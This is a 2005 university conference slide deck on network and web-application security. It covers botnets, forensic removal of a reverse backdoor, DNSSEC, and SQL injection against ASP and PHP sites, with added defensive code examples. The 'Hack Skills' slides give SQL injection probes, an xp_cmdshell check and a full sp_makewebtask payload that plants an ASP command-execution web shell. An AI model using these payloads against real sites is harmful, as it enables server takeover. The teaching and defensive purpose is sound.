WISE 2005 Conference

Presented by Erion Lin,

Department of Information Management,

National Taiwan University


Outline

  • Introduction

  • Network Security

    • Botnet

    • Forensic Analysis of Reverse Backdoor

    • DNSSEC

    • Net Gap

  • Program Security

    • SQL Injection

    • Security Problems of ASP

    • Security Problems of PHP

    • Some Hack Skills

  • Conclusion


Introduction

  • Many information security incidents broke out in 2004

  • Mainland Chinese hackers intruded into the Presidential Office website

  • The threat of the mainland cyber army to our digital society

  • Millions of National Health Insurance and vehicle registration records were leaked

  • Sharp growth in the number of cybercrime cases


[Chart: sharp growth in the number of cybercrime cases]


Introduction (Cont'd)

  • On October 21, 2004, the Executive Yuan promulgated the "Concrete Implementation Plan for Government Agencies (Institutions) to Carry Out Crisis Handling of Information Security Incidents", which requires that "in handling extremely important or important sensitive documents, data and files, every government agency (institution) shall store them in encrypted form and, apart from absolutely necessary network connections, shall also adopt protective measures such as physical isolation, to prevent intrusion and sabotage, tampering, deletion or unauthorised access".


Network Security


Botnet

[Diagram: the hacker commands Zombie1 to Zombie5 over the Internet, and the zombies carry out the attack.]


Bi-apple Backdoor: Initial State

[Diagram: the victim and the target server sit in the intranet behind a firewall, a router and a DMZ DNS server, with the hacker, Zombie1 to Zombie3 and the Bi-apple DNS server on the Internet. In the initial state the Bi-apple DNS server resolves rabbi.bi-apple.net to 127.0.0.1, so the backdoor on the victim has no outside host to contact.]


Backdoor Active State

[Diagram: the same network of intranet (victim, target server), firewall, router, DMZ DNS server and Internet (hacker, Zombie1 to Zombie3, Bi-apple DNS server). The Bi-apple DNS server now resolves rabbi.bi-apple.net to 61.221.104.181, and the victim's lookup of rabbi.bi-apple.net returns that address.]


Backdoor Active State (Cont'd)

[Diagram: the victim's backdoor sends a SYN from the victim to 61.221.104.181:80, an outbound connection that passes the firewall; over that reverse connection the hacker takes remote control and launches the attack on the target server.]


Feature of Bi-Apple Backdoor

  • Hard to Detect

  • Reverse Backdoor

  • Easy to Change the Zombie


Digital Forensic Environment


Digital Forensic Analysis

  • On-Line Analysis

  • Off-Line Analysis


On-Line Analysis

  • Emergency Recovery

  • Find Out the Reason


On-Line Analysis Steps

  • Remove Process

  • Remove File and Registry

  • Reboot


Step 1: Check Process Explorer

Step 2: Check Autoruns

Step 3: Check TCPView

Step 4: Check File

Step 5: Check DLL

Step 6: Reboot

Step 7: Check Process Explorer

Step 8: Check Sniffer

Step 9: Stop Running Process

  • explorer.exe

  • IEXPLORE.exe


Step 10: Delete Malicious Registry Entries

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B49DA3DF-E569-423d-BDEA-8F89128E8107}

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{2E8A6CF6-3500-4A7D-9F54-69CD76D367D2}


Step 11: Reboot

  • Check System Activities Again

  • Check Network Activities Again
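The registry step of the procedure above, turned into a repeatable check as an added example (not code from the presentation): a parser for a regedit .reg export that lists every registered Browser Helper Object with the DLL its CLSID loads and flags the two CLSIDs named in Step 10. The export text, the second CLSID and the DLL paths are constructed placeholders.

```python
import re

# The two BHO CLSIDs the presentation's Step 10 deletes (compared case-insensitively)
MALICIOUS_CLSIDS = {"{b49da3df-e569-423d-bdea-8f89128e8107}",
                    "{2e8a6cf6-3500-4a7d-9f54-69cd76d367d2}"}
BHO_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects"
CLSID_RE = re.compile(r"\{[0-9A-Fa-f]{8}(-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}")

def parse_reg_export(text):
    # Turn a regedit .reg export into {key_path: {value_name: data}}; "@" is the default value
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and "=" in line:
            name, _, data = line.partition("=")
            name = "(Default)" if name == "@" else name.strip('"')
            keys[current][name] = data.strip('"').replace("\\\\", "\\")  # undo .reg escaping
    return keys

def triage_bhos(reg_text):
    # List every registered BHO with the DLL its CLSID loads; flag the known-malicious ones
    keys = parse_reg_export(reg_text)
    report = []
    for path in keys:
        if not path.lower().startswith(BHO_KEY.lower() + "\\"):
            continue
        clsid = path[len(BHO_KEY) + 1:]
        if not CLSID_RE.fullmatch(clsid):
            continue  # not a direct CLSID subkey of the BHO list
        server = keys.get(f"HKEY_CLASSES_ROOT\\CLSID\\{clsid}\\InprocServer32", {})
        report.append({"clsid": clsid,
                       "dll": server.get("(Default)", "<no InprocServer32 key>"),
                       "malicious": clsid.lower() in MALICIOUS_CLSIDS})
    return report

# Constructed export: one CLSID from the slide, one placeholder CLSID, placeholder DLL names
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B49DA3DF-E569-423d-BDEA-8F89128E8107}]
@=""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AAAAAAAA-0000-0000-0000-000000000001}]
@=""
[HKEY_CLASSES_ROOT\CLSID\{B49DA3DF-E569-423d-BDEA-8F89128E8107}\InprocServer32]
@="C:\\WINDOWS\\system32\\placeholder_bho.dll"
"ThreadingModel"="Apartment"
[HKEY_CLASSES_ROOT\CLSID\{AAAAAAAA-0000-0000-0000-000000000001}\InprocServer32]
@="C:\\Program Files\\Vendor\\placeholder_toolbar.dll"
"""
```

On a live system the same text comes from exporting the BHO list and HKEY_CLASSES_ROOT\CLSID with regedit, which writes UTF-16; decode it before passing it to triage_bhos.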


Normal DNS

[Diagram: a plain DNS server on the Internet accepts both the DNS message from the DNS administrator and the fake DNS message from the hacker.]


DNSSEC

[Diagram: a DNS server with DNSSEC accepts the DNS administrator's DNS message and rejects the hacker's fake DNS message.]


DNSSEC

  • TSIG

    • Secret Key

    • One-Way Hash Function

  • SIG(0)

    • Public Key
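To make the Normal DNS versus DNSSEC diagrams and the TSIG bullets concrete, an added example (not code from the presentation) of the secret-key plus one-way-hash check: the server recomputes an HMAC over the message together with the key name, signing time and fudge, so the hacker's fake message and a stale replay are rejected while the administrator's message is accepted. The key name, secret and message contents are constructed, the MAC input is simplified from the TSIG specification, and SIG(0)'s public-key signature is not shown.

```python
import hashlib
import hmac
import struct

# Constructed key store: key name and shared secret are assumptions, not from the slides
KEYS = {"wise2005.key": b"constructed-shared-secret"}
FUDGE = 300  # seconds of clock skew the server tolerates (TSIG's customary default)

def tsig_mac(key_name, message, time_signed):
    # HMAC over the DNS message plus the TSIG variables that bind key and time.
    # Simplified: real TSIG also covers class, TTL, algorithm, error and other-data fields.
    variables = key_name.encode("ascii") + struct.pack(">QH", time_signed, FUDGE)
    return hmac.new(KEYS[key_name], message + variables, hashlib.sha256).digest()

def sign_message(key_name, message, time_signed):
    # What the DNS administrator sends: the message with its TSIG trailer
    return {"msg": message, "key": key_name, "time": time_signed,
            "mac": tsig_mac(key_name, message, time_signed)}

def server_decision(pkt, now):
    # The TSIG-enabled server's verdict: "accepted" or the reason it was rejected
    if pkt["key"] not in KEYS:
        return "rejected: unknown key"
    if abs(now - pkt["time"]) > FUDGE:
        return "rejected: outside fudge window"  # stale or replayed message
    expected = tsig_mac(pkt["key"], pkt["msg"], pkt["time"])
    if not hmac.compare_digest(expected, pkt["mac"]):
        return "rejected: bad mac"  # forged or altered content
    return "accepted"

# Constructed messages; on the wire these would be binary DNS UPDATE packets
ADMIN_MSG = b"UPDATE www.example.test A 192.0.2.10"
FAKE_MSG = b"UPDATE www.example.test A 198.51.100.66"

def demo(now=1130000000):
    # The genuine message, a hacker's fake with the same trailer, and a replay an hour later
    genuine = sign_message("wise2005.key", ADMIN_MSG, now)
    fake = dict(genuine, msg=FAKE_MSG)  # content swapped, but the MAC cannot be recomputed
    return (server_decision(genuine, now), server_decision(fake, now),
            server_decision(genuine, now + 3600))
```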


Net Gap

[Diagram: between the Internet-facing firewall and the intranet sit Net Gap1, the router and Net Gap2; a normal TCP/IP packet and a malicious TCP/IP packet both enter the packet-processing stage.]


Net Gap (Cont'd)

  • Net Gap1: Deconstruct Packets

  • Net Gap2: Reconstruct Packets


Program Security


SQL Injection

  • The attacker can execute arbitrary SQL queries and/or commands on the backend database server through the Web application.


Where SQL Injection May Occur


SQL Injection Detection Skill

  • Before

    • http://www.ox.com.tw/script.asp?id=2' : IE returns an ODBC error.

  • New Generation

    • http://www.ox.com.tw/script.asp?id=2 and 1=1 : IE returns the normal record.

    • http://www.ox.com.tw/script.asp?id=2 and 1=2 : IE returns no record.
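The two probe families above, worked through as an added example (not code from the presentation): a string-concatenated lookup that behaves exactly as the slide describes for id=2', id=2 and 1=1 and id=2 and 1=2, the validated and parameterised version beside it, and a small check that flags those probes in web-server access-log lines. The news table and the log lines are constructed, and SQLite stands in for the ODBC/MSSQL backend.

```python
import re
import sqlite3

# Constructed stand-in for the news table behind script.asp?id=... (not from the slides)
_conn = sqlite3.connect(":memory:")
_conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
_conn.executemany("INSERT INTO news VALUES (?, ?)",
                  [(1, "first story"), (2, "second story"), (3, "third story")])

def vulnerable_lookup(raw_id):
    # The flawed pattern: the query-string value is pasted straight into the SQL text
    return _conn.execute("SELECT title FROM news WHERE id=" + raw_id).fetchall()

def safe_lookup(raw_id):
    # Hardened form: check the input has the shape an id should have, then bind it
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return None  # reject quietly; no ODBC-style error text reaches the browser
    return _conn.execute("SELECT title FROM news WHERE id=?", (int(raw_id),)).fetchall()

def classify_probe(raw_id):
    # What the browser shows for one of the slide's probes against the vulnerable code
    try:
        rows = vulnerable_lookup(raw_id)
    except sqlite3.OperationalError:
        return "error"  # counterpart of the ODBC error IE shows for id=2'
    return "normal" if rows else "empty"

# Detection side: the same probes as they appear in web-server access logs
PROBE_RE = re.compile(r"id=\d+(%27|'|\s+and\s+1=[12]\b)", re.IGNORECASE)

def flag_probes(log_lines):
    # Return the request targets whose id carries a quote or an "and 1=1" / "and 1=2" tail
    hits = []
    for line in log_lines:
        m = re.search(r'"GET (\S+)', line)
        if m and PROBE_RE.search(m.group(1).replace("+", " ").replace("%20", " ")):
            hits.append(m.group(1))
    return hits

SAMPLE_LOG = [  # constructed access-log lines
    '10.0.0.5 - - [01/Oct/2005:10:00:00 +0800] "GET /script.asp?id=2 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Oct/2005:10:00:01 +0800] "GET /script.asp?id=2%27 HTTP/1.1" 500 233',
    '10.0.0.9 - - [01/Oct/2005:10:00:02 +0800] "GET /script.asp?id=2+and+1=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Oct/2005:10:00:03 +0800] "GET /script.asp?id=2%20and%201=2 HTTP/1.1" 200 17',
]
```

Against the hardened lookup all three probes return None, so the two response sizes the "New Generation" technique compares never differ.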


Security Problems of ASP

[Flowchart: the attack tree the slide draws for ASP sites. It starts from SQL Injection and DB detecting and branches by database: MS SQL (xp_cmdshell, recovery), MySQL (directory traversal, file information leak), Oracle, and others (mdb, db2, Informix). Further branches cover echoing a script or an exe file, firewall outbound testing, the upload area, FTP, TFTP and Network Neighborhood shares, the configuration file and default configuration, leading to installing a web shell, adding a new account or installing a backdoor; each path ends in Failure or Success.]


Hack Skills of ASP

  • ASP SQL Injection

  • MSSQL DB Detection Skill

  • MSSQL Stored Procedure Skill

  • ASP WebShell Skill

  • Firewall Outbound Shell

  • One Way Hacking

  • Backdoor Skill


Security Problems of PHP

[Flowchart: the counterpart tree for PHP sites. From the homepage and its source code, program defects lead to SQL Injection and DB detection by database: MS SQL, MySQL (directory traversal, file information leak, load file, save file, create temp DB, save backdoor into DB), Oracle, and others (mdb, db2, Informix). Other branches cover password breaking of the password file, testing system accounts and passwords, the system configuration file, the upload area, and whether the system section or the web section is writable; the configuration file and default configuration can be overridden. The paths lead to installing a web shell or installing a backdoor and end in Failure or Success.]


Hack Skills of PHP

  • Writable Directory Testing Skill

  • File Uploading DB Skill

  • Temp Table Design Skill

  • PHP WebShell Skill

  • Password Breaking Skill

  • Unix Backdoor Skill


MSSQL DB Detection Skill

  • And 1=(Select @@version)

    • MSSQL version information


MSSQL Stored Procedure Skill

  • http://www.ox.com.tw/asp/test.asp?id=294 and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell')

  • If xp_cmdshell exists

    • the original news record is displayed

  • If xp_cmdshell does not exist

    • an error message appears or the site returns to the home page


ASP WebShell Skill

  • exec sp_makewebtask @outputfile%3d‘c:\inetpub\wwwroot/a.asp',@charset%3dbig5,@query%3d'select ''<%25On Error Resume Next : Set oscript %3d Server.CreateObject("wscript.SHELL") : Set oscriptNet %3d Server.CreateObject("wscript.NETWORK") : Set oFileSys %3d Server.CreateObject("scripting.FileSystemObject") : szCMD %3d Request.Form(".CMD") : If (szCMD <>"")Then : szTempFile %3d "C:\" %26 oFileSys.GetTempName() : Call oscript.Run ("cmd.exe /c " %26 szCMD %26 " > " %26 szTempFile, 0, True) : Set oFile %3d oFilesys.OpenTextFile (szTempFile, 1, False, 0) End If %25> <HTML><BODY><FORM action%3d"<%25%3d Request.ServerVariables("URL")%25>" method%3d"POST"> <input type%3dtext name%3d".CMD" size%3d45 value%3d"<%25%3d szCMD %25>"><input type%3dsubmit value%3d"Run"> </FORM><PRE> <%25 If (IsObject(oFile))Then : On Error Resume Next : Response.Write Server.HTMLEncode(oFile.ReadAll) : oFile.Close : Call oFileSys.DeleteFile(szTempFile, True) : End If%25> </BODY></HTML> '‘ '


Backdoor Skills

  • Port reuse technique

    • Typical representative backdoor: 駭客之門 (Hacker's Door)

    • It consists of only one DLL file and starts itself by infecting a system file; the infected system file's size and date do not change. It also uses thread injection, so it has no process of its own. It does not open a port itself but reuses any port already opened by a system process, such as 80, 135, 139 or 445.


Reuse Port Skill

[Diagram: the firewall opens ports 21 and 80 from outside to inside and restricts everything from inside to outside. The Web and FTP services listen on those ports and the backdoor (BD) reuses them instead of opening its own, so the IE and ftp clients on the outside reach it through the permitted ports (steps 1 to 3 in the original figure).]


Conclusion

  • Software Security Quality

    • Identify all data that comes from user input.

    • Handle meta-characters carefully.

    • Don't give users overly detailed error messages.

    • Try to understand the characteristics of the programming language.

    • Avoid using APIs that call the shell directly.

    • Check every application's default settings.

  • New Version of BS7799

    • Different vendors.

  • Information Security Education

  • Management, Information and System


Thanks for Your Listening

